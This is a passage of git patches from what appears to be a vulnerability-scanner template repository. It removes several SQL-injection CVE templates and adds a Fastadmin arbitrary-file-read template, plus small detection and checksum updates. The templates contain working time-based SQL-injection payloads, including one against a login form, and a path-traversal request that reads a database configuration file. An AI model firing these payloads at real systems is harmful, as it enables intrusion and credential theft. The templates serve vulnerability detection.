/dev/null @@ -1,45 +0,0 @@ -id: CVE-2022-31981 - -info: - name: Online Fire Reporting System v1.0 - SQL injection - author: theamanrawat - severity: high - description: | - Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-6.md - - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-31981 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-31981 - cwe-id: CWE-89 - epss-score: 0.01593 - epss-percentile: 0.87356 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* - metadata: - verified: "true" - max-request: 1 - vendor: online_fire_reporting_system_project - product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project - -http: - - method: GET - path: - - "{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN" - - matchers: - - type: dsl - dsl: - - 'duration>=6' - - 'status_code == 200' - - 'contains(content_type, "text/html")' - - 'contains(body, "Control Teams")' - condition: and -# digest: 4a0a00473045022100d65b2d7292abe523b4dc1d6438eaab7a214662256779f7eb3c0bb76b8747d5e50220050bf41ca7a3b23c0054e85bf5aa2bf734b36b2a69ec82c38a61e68fc2d507d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml deleted file mode 100644 index ec3c541336..0000000000 --- a/http/cves/2022/CVE-2022-31982.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2022-31982 - -info: - name: Online Fire Reporting System v1.0 - SQL injection - author: theamanrawat - severity: high - description: | - Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md - - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-31982 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-31982 - cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* - metadata: - verified: "true" - max-request: 1 - vendor: online_fire_reporting_system_project - product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project - -http: - - method: GET - path: - - "{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN" - - matchers: - - type: dsl - dsl: - - 'duration>=6' - - 'status_code == 200' - - 'contains(content_type, "text/html")' - - 'contains(body, "Request Detail")' - condition: and -# digest: 490a00463044022010dde84fca947b7396161fd4683955e87f7f25ea2671996f04fd6011e69346220220781574af1cca7ad8a241f7d8ab76479836e61236b6b46d7a4f9136cea968d23b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml deleted file mode 100644 index 71c27b9277..0000000000 --- a/http/cves/2022/CVE-2022-31983.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2022-31983 - -info: - name: Online Fire Reporting System v1.0 - SQL injection - author: theamanrawat - severity: high - description: | - Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. - reference: - - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md - - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-31983 - - https://github.com/nomi-sec/PoC-in-GitHub - - https://github.com/trhacknon/Pocingit - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-31983 - cwe-id: CWE-89 - epss-score: 0.13959 - epss-percentile: 0.95665 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* - metadata: - verified: "true" - max-request: 1 - vendor: online_fire_reporting_system_project - product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project - -http: - - method: GET - path: - - "{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN" - - matchers: - - type: dsl - dsl: - - 'duration>=6' - - 'status_code == 200' - - 'contains(content_type, "text/html")' - - 'contains(body, "Request Detail")' - condition: and -# digest: 490a0046304402204af8863950057b32e9684b9023e7884d1a76824a27e8591e296376788d9565e302202866cbbcb967e8a82db30b5e44ca11175311f2f73222aa124aafe5a17f3f4069:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml deleted file mode 100644 index 1449ca693b..0000000000 --- a/http/cves/2023/CVE-2023-29622.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2023-29622 - -info: - name: Purchase Order Management v1.0 - SQL Injection - author: theamanrawat - severity: critical - description: | - Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. - reference: - - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/SQLi - - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html - - https://nvd.nist.gov/vuln/detail/CVE-2023-29622 - - https://portswigger.net/web-security/sql-injection - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-29622 - cwe-id: CWE-89 - epss-score: 0.02992 - epss-percentile: 0.90889 - cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* - metadata: - verified: "true" - max-request: 1 - vendor: purchase_order_management_project - product: purchase_order_management - tags: cve2023,cve,sqli,purchase-order,poms,purchase_order_management_project - -http: - - raw: - - | - POST /classes/Login.php?f=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - username=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN - - matchers: - - type: dsl - dsl: - - 'duration>=6' - - 'status_code == 200' - - 'contains(header, "text/html")' - - 'contains(body, "status\":\"incorrect")' - condition: and -# digest: 4a0a0047304502205279b241ecf32df15ffa523a7a164a86fb770d7bdac0be256ffd4930452d13f5022100d4cc576894eab1b14574b357ab4f365e85a04c865af32e12d28f03751d468c34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c21674d4bbd2cc9d11fe99d588e35713a5c6a807 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 23 Jun 2024 11:55:13 +0530 Subject: [PATCH 0509/1841] Update minecraft-enum.yaml --- javascript/enumeration/minecraft-enum.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/javascript/enumeration/minecraft-enum.yaml b/javascript/enumeration/minecraft-enum.yaml index 485dd5cb7e..569e858ef6 100644 --- a/javascript/enumeration/minecraft-enum.yaml +++ b/javascript/enumeration/minecraft-enum.yaml @@ -12,18 +12,22 @@ info: verified: true max-request: 1 shodan-query: product:"Minecraft" - tags: js,network,minecraft,enum + tags: js,network,minecraft,enum + javascript: + - pre-condition: | + isPortOpen(Host,Port); - code: | let data = "fe01" let c = require("nuclei/net"); let conn = c.Open('tcp', `${Host}:${Port}`); conn.SendHex(data); let response = conn.RecvString(); - const version = response.slice(16, 30).replace(/(\d+)(\d{1})(\d+)/, "$1.$2.$3"); - const description = response.slice(30, -4); - const onlinePlayers = response.slice(-1); - const maxPlayers = response.slice(-3); + let cleanedResponse = response.replace(/\x00/g, ''); + const version = cleanedResponse.slice(16, 30).replace(/(\d+)(\d{1})(\d+)/, "$1.$2.$3"); + const description = cleanedResponse.slice(30, -4); + const onlinePlayers = cleanedResponse.slice(-1); + const maxPlayers = cleanedResponse.slice(-3); Export("Version: ", version , " Description:", description ," Online Players:", onlinePlayers, " Maximum Players:", maxPlayers) args: @@ -44,4 +48,3 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a00473045022023b2976e91e7c92db1fe31bd18bb5a24b0fd67ce16a0fdf4291a8b93a685f9bb022100cf6cb8408790d6c30b2269bc44c79289d8827ab7a427946efb332ffb694bf089:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 641c4fdd4131da386189a6abc3692ce9a4bfd1d3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 23 Jun 2024 11:58:00 +0530 Subject: [PATCH 0510/1841] Update minecraft-enum.yaml --- javascript/enumeration/minecraft-enum.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/enumeration/minecraft-enum.yaml b/javascript/enumeration/minecraft-enum.yaml index 569e858ef6..ff8e422f28 100644 --- a/javascript/enumeration/minecraft-enum.yaml +++ b/javascript/enumeration/minecraft-enum.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:"Minecraft" - tags: js,network,minecraft,enum + tags: js,network,minecraft,enum javascript: - pre-condition: | From 98d7958f10f70015dc9956839120fe783905ca4a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 23 Jun 2024 12:24:17 +0530 Subject: [PATCH 0511/1841] Create fastadmin-lfi.yaml --- http/vulnerabilities/other/fastadmin-lfi.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/vulnerabilities/other/fastadmin-lfi.yaml diff --git a/http/vulnerabilities/other/fastadmin-lfi.yaml b/http/vulnerabilities/other/fastadmin-lfi.yaml new file mode 100644 index 0000000000..d82caf9f30 --- /dev/null +++ b/http/vulnerabilities/other/fastadmin-lfi.yaml @@ -0,0 +1,36 @@ +id: fastadmin-lfi + +info: + name: Fastadmin framework - Arbitrary File Read + author: T + severity: high + description: | + Arbitrary file reading vulnerability exists in Fastadmin framework. + metadata: + verified: true + fofa-query: app="FASTADMIN-框架" + reference: + - https://github.com/wy876/POC/blob/main/Fastadmin%E6%A1%86%E6%9E%B6%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + tags: misconfig,fastadmin,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/index/ajax/lang?lang=..//..//application/database" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'jsonpReturn' + - 'database' + - 'password' + condition: and + + - type: status + status: + - 200 From 083a19c071bd5485d5dbc1d7d7dfc806d33c9c78 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 23 Jun 2024 17:25:08 +0200 Subject: [PATCH 0512/1841] Update ibm-maximo-login.yaml --- http/exposed-panels/ibm/ibm-maximo-login.yaml | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/ibm/ibm-maximo-login.yaml b/http/exposed-panels/ibm/ibm-maximo-login.yaml index 96ddbaf8f2..1847aafbf6 100644 --- a/http/exposed-panels/ibm/ibm-maximo-login.yaml +++ b/http/exposed-panels/ibm/ibm-maximo-login.yaml @@ -2,11 +2,12 @@ id: ibm-maximo-login info: name: IBM Maximo Login Panel - Detect - author: ritikchaddha + author: ritikchaddha,righettod severity: info description: IBM Maximo login panel was detected. reference: - https://www.ibm.com/support/pages/what-default-username-and-password-websphere-application-server-community-edition-and-how-add-users-admin-group + - https://www.ibm.com/products/maximo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 @@ -18,12 +19,12 @@ info: product: maximo_asset_management shodan-query: http.favicon.hash:-399298961 fofa-query: icon_hash=-399298961 - tags: maximo,panel,ibm + tags: maximo,panel,ibm,login,detect http: - method: GET path: - - "{{BaseURL}}/maximo/webclient/login/login.jsp" + - "{{BaseURL}}/maximo/webclient/login/login.jsp?appservauth=true" host-redirects: true max-redirects: 2 @@ -35,9 +36,16 @@ http: words: - "maximo-icon.png" - "IBM" + - "Maximo" condition: and - type: status status: - 200 -# digest: 4a0a004730450220108beea62e9138f7191cbc0b7b73120efe1cea19d5045abe5b9c370a44c9404e022100e266d1db3b98b7964ba3fa722ffe802d59d55f359ccf759470f532fa45c333ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)Copyright\s+IBM\s+Corp\.\s+([0-9-]+)' From f6246ccade177f13871ca45cdcf9b28f512183ac Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 24 Jun 2024 00:20:34 +0000 Subject: [PATCH 0513/1841] Auto WordPress Plugins Update [Mon Jun 24 00:20:34 UTC 2024] :robot: --- helpers/wordpress/plugins/wp-fastest-cache.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/wp-fastest-cache.txt b/helpers/wordpress/plugins/wp-fastest-cache.txt index a77d7d9272..5975b143a0 100644 --- a/helpers/wordpress/plugins/wp-fastest-cache.txt +++ b/helpers/wordpress/plugins/wp-fastest-cache.txt @@ -1 +1 @@ -1.2.7 \ No newline at end of file +1.2.8 \ No newline at end of file From 9f0f4329c43def506d86eaef6602c86b8b369124 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 24 Jun 2024 10:52:23 +0530 Subject: [PATCH 0514/1841] minor update --- http/vulnerabilities/other/fastadmin-lfi.yaml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/http/vulnerabilities/other/fastadmin-lfi.yaml b/http/vulnerabilities/other/fastadmin-lfi.yaml index d82caf9f30..f5f4d0094c 100644 --- a/http/vulnerabilities/other/fastadmin-lfi.yaml +++ b/http/vulnerabilities/other/fastadmin-lfi.yaml @@ -2,25 +2,23 @@ id: fastadmin-lfi info: name: Fastadmin framework - Arbitrary File Read - author: T + author: Hel10-Web severity: high description: | Arbitrary file reading vulnerability exists in Fastadmin framework. - metadata: - verified: true - fofa-query: app="FASTADMIN-框架" reference: - https://github.com/wy876/POC/blob/main/Fastadmin%E6%A1%86%E6%9E%B6%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md - tags: misconfig,fastadmin,lfi + metadata: + verified: true + max-request: 1 + fofa-query: app="FASTADMIN-框架" + tags: fastadmin,lfi http: - method: GET path: - "{{BaseURL}}/index/ajax/lang?lang=..//..//application/database" - host-redirects: true - max-redirects: 2 - matchers-condition: and matchers: - type: word From cc6fb304f4345b94cb5b0c35496ec4876646348e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 24 Jun 2024 05:25:23 +0000 Subject: [PATCH 0515/1841] Auto Generated New Template Addition List [Mon Jun 24 05:25:23 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b4f5526224..b76b034695 100644 --- a/.new-additions +++ b/.new-additions @@ -120,4 +120,5 @@ http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml http/vulnerabilities/gradio/gradio-lfi.yaml http/vulnerabilities/gradio/gradio-ssrf.yaml +http/vulnerabilities/other/fastadmin-lfi.yaml network/detection/mikrotik-ssh-detect.yaml From 6a46dc2f0c0bf8561c3e8790ba7746183c2a3b15 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 24 Jun 2024 05:25:30 +0000 Subject: [PATCH 0516/1841] Auto Generated Templates Checksum [Mon Jun 24 05:25:30 UTC 2024] :robot: --- templates-checksum.txt | 549 +++++++++++++++++++++-------------------- 1 file changed, 275 insertions(+), 274 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 11ea77c28b..6aeffe6536 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -486,72 +486,72 @@ file/malware/gozi-malware.yaml:3367af9619300eaceddcd92e7c771767a60bc411 file/malware/gpgqwerty-malware.yaml:fa5ad4427cbd567433ead29ae1d159ca427d56ce file/malware/greame-malware.yaml:02217bf5927c58c56dde1043a656cc8b9f05f4a5 file/malware/grozlex-malware.yaml:bd6ee9393817d362ba0729a989f145547a38df15 -file/malware/hash/anthem-deeppanda-malware-hash.yaml:8a8de4db2fc1a2047ff1280950eab7d455a21ca8 -file/malware/hash/applejeus-malware-hash.yaml:5b9a1fcc0655b7c738f3790103ae803fb7a2165b -file/malware/hash/avburner-malware-hash.yaml:175ef4e78f38e0472e4b9dc1614e709b237ea54c -file/malware/hash/backwash-malware-hash.yaml:254320dde94fc06dc697ffa3387fd8ba4a1a7fd5 -file/malware/hash/blackenergy-driver-amdide-hash.yaml:401d355fdd09d24a0d166bef93ea4abc7572a248 -file/malware/hash/blackenergy-driver-malware-hash.yaml:5405d7feb85f0e7758a47a369ea6e9b93d25926d -file/malware/hash/blackenergy-killdisk-malware-hash.yaml:0aebbe8b99d250c2dfe875446f5de5c5b9c0fbc8 -file/malware/hash/blackenergy-ssh-malware-hash.yaml:17eb753cc46f8f4963d4cf9d4185ad969ea3b594 -file/malware/hash/blackenergy-vbs-malware-hash.yaml:7bc2ad119c25f81cbdf2229728aba0829fcb7c08 -file/malware/hash/bluelight-malware-hash.yaml:0ec2971becec728ce5886bcd07ee195f3e74a8c0 -file/malware/hash/bluetermite-emdivi-malware-hash.yaml:44912890eb85f2e978eb9b176a461c9d8943840f -file/malware/hash/bluetermite-emdivi-sfx-hash.yaml:711c5cc37c6584d27cf3ed3820c80ce5bc75e7ff -file/malware/hash/charmingcypress-malware-hash.yaml:c7d792ba6052364803bb97e309b084a45b2ffa43 -file/malware/hash/cheshirecat-malware-hash.yaml:9275ccf7de2096e1280be461f2102590b20d32ad -file/malware/hash/cloudduke-malware-hash.yaml:fe649c47667c26c3a2f9b9b80e3de39a0c4a4255 -file/malware/hash/codoso-gh0st-malware.yaml:f2de52eb44edf0f82756a97b8b9a909e23fcf79f -file/malware/hash/codoso-malware-hash.yaml:ec103ba162c3b1d57abc41d5fd030b9e07ae5026 -file/malware/hash/codoso-pgv-malware-hash.yaml:88473f2d1fdb08f3fc29a27ece4736cd7f984521 -file/malware/hash/codoso-plugx-malware-hash.yaml:a3361b28ced4ba3f717c5ed171bff135020fba15 -file/malware/hash/disgomoji-malware-hash.yaml:6ed3c40bf2b2cfd3bc0b25a0ca71fe8f34d27846 -file/malware/hash/dubnium-malware-hash.yaml:66bc490a584a7ed23a8912e7ecccbb5f092e605e -file/malware/hash/dubnium-sshopenssl-malware-hash.yaml:9f28c0c59819459b112aa736a5aca9a57d03d5e4 -file/malware/hash/emissary-malware-hash.yaml:8ef72ae8ffd57f2d7d92955877a722a37bced76d -file/malware/hash/evilbamboo-malware-hash.yaml:dc593c3ee3f8d84cec7dde9e1f392c3d853c18b3 -file/malware/hash/fakem-malware-hash.yaml:be36e4b7d31d368ff960c1d91d1307ef463cf66c -file/malware/hash/flipflop-malware-hash.yaml:5f027bbd9f9756051811e99826b3b85c8a3f97bd -file/malware/hash/furtim-malware-hash.yaml:f6ce5c5b1e9f27bff627d0bbce722fb9fc6fab13 -file/malware/hash/gimmick-malware-hash.yaml:452b9f313d567b3341ef2515571c1990164f2bc0 -file/malware/hash/godzilla-webshell-hash.yaml:06decaf5c9e14daad2bf34a351fda9b82bc99221 -file/malware/hash/greenbug-malware-hash.yaml:e51561e86727a09014fc0dddd80ece02d1a779e7 -file/malware/hash/ico-malware-hash.yaml:2e83beba9d1487b6c7ec44c9ed3be7ea477035a0 -file/malware/hash/industroyer-malware-hash.yaml:bb0715fe709b1648505030b4cfa4f35001a572af -file/malware/hash/ironPanda-htran-malware-hash.yaml:235d100100922afc0c7c8db239df8406669a32cf -file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml:5f8a26f3fea7ff59fa859a6bbe12adf63a0be721 -file/malware/hash/ironpanda-malware-hash.yaml:95897bb3a313996576ff77fb622a15e4a8bdb462 -file/malware/hash/locky-ransomware-hash.yaml:8ca7178dc2f0d87ecf08260f6510616197587873 -file/malware/hash/minidionis-readerview-malware-hash.yaml:7ed9c5456e0b0badb5748a2291a099a0e413dae8 -file/malware/hash/minidionis-vbs-malware-hash.yaml:7f0e0c660e5ba57335bb3957c5378cc75ad60afc -file/malware/hash/naikon-apt-malware-hash.yaml:c83b12f51a84e98ae05527abf5faa9d74748470e -file/malware/hash/neuron2-malware-hash.yaml:f3ac42a8306efa63bf4c562ca45d5985cfd2a904 -file/malware/hash/oilrig-malware-hash.yaml:c9059433e8c18cc962df5c9129d2091722459d99 -file/malware/hash/passcv-ntscan-malware-hash.yaml:7d1efb6638a88c98ef56955209a1ed5dab80ea7f -file/malware/hash/passcv-sabre-malware-hash.yaml:415e1ea451092ca91a6d701e096a083d595ce023 -file/malware/hash/passcv-signingcert-malware-hash.yaml:65655778290d72bda1663da6bc22b799ee12b8b7 -file/malware/hash/petya-ransomware-hash.yaml:d85c9e4ad789796be063225a74ed57f53023b8db -file/malware/hash/poseidongroup-maldoc-malware-hash.yaml:51e18405751f2f30ce0e4d29a53e0d50300533c2 -file/malware/hash/poseidongroup-malware-hash.yaml:05d6453e83b68620f89a802522d31336a5db9619 -file/malware/hash/powerstar-malware-hash.yaml:6df4fc3a7252f86faa62304594e91ec26374527c -file/malware/hash/purplewave-malware-hash.yaml:f012c95a15ddadc82face1e76d80b4156ed24917 -file/malware/hash/red-leaves-malware-hash.yaml:0ac57673e3b43055ea81729ce3330ff84341d52c -file/malware/hash/regeorg-webshell-hash.yaml:bb87337926146954751a514d3e15d55737c5c43e -file/malware/hash/revil-ransomware-hash.yaml:60b6abd75a69b29f6be4e302c0a3539acabbf238 -file/malware/hash/rokrat-malware-hash.yaml:9dd844b397e5c6da9719cad8861b692a86b81e96 -file/malware/hash/sauron-malware-hash.yaml:7a810169710231b50ffdec2253be5808fae98893 -file/malware/hash/seaduke-malware-hash.yaml:3c20079a8c1937ad5cc6e3181a31066883dd61a2 -file/malware/hash/sfx1-malware-hash.yaml:162e36001251ea57c3331109b920658317aaa4b3 -file/malware/hash/sfxrar-acrotray-malware-hash.yaml:b9a1783463ee560a07c8057cf2bd583f9b04094d -file/malware/hash/sharpext-malware-hash.yaml:2200fa9665608af11a7cd6ee39be33a357f13e6e -file/malware/hash/sofacy-Winexe-malware-hash.yaml:b2be16a086126573ad2d1eace5a4084a3bb89bed -file/malware/hash/sofacy-bundestag-malware-hash.yaml:8adb1c70db65b3436e462688875da031c40d895d -file/malware/hash/sofacy-fybis-malware-hash.yaml:8ff8771cbec7bb32396176be4341d999470653a3 -file/malware/hash/tidepool-malware-hash.yaml:370550b5885530298c410620d9aaaabe24e16cd0 -file/malware/hash/turla-malware-hash.yaml:da71c6ae0ed12eb8bc2510604b579b3e389c166e -file/malware/hash/unit78020-malware-hash.yaml:4a4a09689eda9a732baa9697998d15b076bf05ac +file/malware/hash/anthem-deeppanda-malware-hash.yaml:bb3642fcf6638c330f08d8dae54afb75f1ecc596 +file/malware/hash/applejeus-malware-hash.yaml:4865b8c3e03b53c144d9370b16a1befe92af894c +file/malware/hash/avburner-malware-hash.yaml:27fc3e8dad2eb7a775ae263fa06a573a91c45e4f +file/malware/hash/backwash-malware-hash.yaml:75e9529b4fa6c80619d2ab92063bc0b75bdb3aba +file/malware/hash/blackenergy-driver-amdide-hash.yaml:06705d8475df3472f50d63bf20cc95073923b3f5 +file/malware/hash/blackenergy-driver-malware-hash.yaml:6b27b5f6419a81d81d495aaf0ea4055eb88d67e6 +file/malware/hash/blackenergy-killdisk-malware-hash.yaml:417cb6add69482352064dedd30a62028527af0af +file/malware/hash/blackenergy-ssh-malware-hash.yaml:bd8231fc3a0966f01ec85bcd3c70ccfd54bed031 +file/malware/hash/blackenergy-vbs-malware-hash.yaml:c2fde4cb8f242cfeb19608a407d58582c9343b0f +file/malware/hash/bluelight-malware-hash.yaml:99bb1b31963f87d0fbad5ed22ab4adc2a4b0cd24 +file/malware/hash/bluetermite-emdivi-malware-hash.yaml:36e268444afbceabcf2f5483a3aaa24808aa9621 +file/malware/hash/bluetermite-emdivi-sfx-hash.yaml:c9eb9b0b41d8ae159c81b1407f113a7deb0929af +file/malware/hash/charmingcypress-malware-hash.yaml:c0adf38e2eeffca3653820b7f805f988d22e3b0b +file/malware/hash/cheshirecat-malware-hash.yaml:9604a650af0f441b6f874ca2d12056b558171db3 +file/malware/hash/cloudduke-malware-hash.yaml:ab9815166ddce10ac6e2539dd9f3cb67c02fc320 +file/malware/hash/codoso-gh0st-malware.yaml:bec24823357fce8bac3b975f317987d6bb071024 +file/malware/hash/codoso-malware-hash.yaml:d2ed48c424a243bea12f205148df4dcf9a4e3b9d +file/malware/hash/codoso-pgv-malware-hash.yaml:b7dbe66c57765e19962c2621e812e9606b5af808 +file/malware/hash/codoso-plugx-malware-hash.yaml:ba969bbd44b1e410f970d3d6062b4803121b10cd +file/malware/hash/disgomoji-malware-hash.yaml:6d3ea4881c66e880e0b8a2ff638415b76579d59e +file/malware/hash/dubnium-malware-hash.yaml:0b2d45db1c9a2ce12b7197718142f03c65acad8d +file/malware/hash/dubnium-sshopenssl-malware-hash.yaml:809b70b1200603b6dd5aaebb7077335d0b3ac152 +file/malware/hash/emissary-malware-hash.yaml:dbb7dcc6d2c27c0a8b20fd32d308164a3a77d7ae +file/malware/hash/evilbamboo-malware-hash.yaml:96959ef1b9d6c37fdeb7ec05d57e4ca114d38648 +file/malware/hash/fakem-malware-hash.yaml:63503efa5c249ce3e74ee636b6b23baf07cf5658 +file/malware/hash/flipflop-malware-hash.yaml:cc391b424f8cd13295e5eb5a0cf3957d25aed911 +file/malware/hash/furtim-malware-hash.yaml:d3afd88f14a1e0c07b4c0823813b4106eccde549 +file/malware/hash/gimmick-malware-hash.yaml:8f79ba611ebce3c6409114a95dc137fb98871586 +file/malware/hash/godzilla-webshell-hash.yaml:0c9be2cab1c0480f0e4ced2ba48a6732b19492e7 +file/malware/hash/greenbug-malware-hash.yaml:3a10f5d01d62a1606f3fdde277e33264914d4bb2 +file/malware/hash/ico-malware-hash.yaml:2e3fc976be483a9db98285cf893e45cd90b7cb6b +file/malware/hash/industroyer-malware-hash.yaml:64c38a31f91f13c33709ec7db92f5389d4d082d7 +file/malware/hash/ironPanda-htran-malware-hash.yaml:dbd480aa67e94e4c2232813f0372fa65f06aff0d +file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml:fd30686f94f8dc352f776bd314f599561ab5543b +file/malware/hash/ironpanda-malware-hash.yaml:a0a2d303efe23e2f7b77434f5e9b16a1a40a7581 +file/malware/hash/locky-ransomware-hash.yaml:5d567c1fcaf1703d2837c4a4af2e3bd889d8766d +file/malware/hash/minidionis-readerview-malware-hash.yaml:1ac390045933b5157feb70eb37a93ceacf147136 +file/malware/hash/minidionis-vbs-malware-hash.yaml:40aaafab8cc281de9906e658e879c89251d8b291 +file/malware/hash/naikon-apt-malware-hash.yaml:858e0f2954b8ce8f8a5eaf50d07a220a89ca009f +file/malware/hash/neuron2-malware-hash.yaml:d2626f562e3f7c7be40fdda0180affe41ea1b14b +file/malware/hash/oilrig-malware-hash.yaml:002591392ad1acf55c3034218b36bb7b992a442f +file/malware/hash/passcv-ntscan-malware-hash.yaml:faff7de8b889f5015b7cfaa428382850549fbb40 +file/malware/hash/passcv-sabre-malware-hash.yaml:88556ab3408121a616af39d8fecbfe0447dd3777 +file/malware/hash/passcv-signingcert-malware-hash.yaml:3da724d67f1832b5518c8b31054122e1f9aa9957 +file/malware/hash/petya-ransomware-hash.yaml:a03e15bcf761711cdab594649cfe13fa9605f90e +file/malware/hash/poseidongroup-maldoc-malware-hash.yaml:466f570c989143ced35f2ab1e82b819ccb5e6887 +file/malware/hash/poseidongroup-malware-hash.yaml:516f861330f2af629758648e3a7daf913ce2cce7 